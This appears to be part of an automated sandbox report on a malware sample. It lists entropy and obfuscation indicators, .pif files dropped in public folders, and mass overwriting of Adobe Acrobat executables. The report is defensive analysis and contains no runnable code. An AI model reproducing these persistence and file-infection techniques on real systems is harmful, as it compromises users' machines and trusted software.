Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D05E7C push ecx; mov dword ptr [esp], edx 0_2_02D05E7E
Source: AppVClient.exe.13.dr Static PE information: section name: .reloc entropy: 7.936521710837491
Source: FXSSVC.exe.13.dr Static PE information: section name: .reloc entropy: 7.9422741099942105
Source: elevation_service.exe.13.dr Static PE information: section name: .reloc entropy: 7.943951723334859
Source: elevation_service.exe0.13.dr Static PE information: section name: .reloc entropy: 7.945960471485194
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior
barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\605af54964cdb3b4.bin
Drops PE files with a suspicious file extension
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif Jump to dropped file
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe File created: C:\Users\Public\Libraries\aymtmquJ.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Juqmtmya.PIF Jump to dropped file
Drops executable to a common third party application directory
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
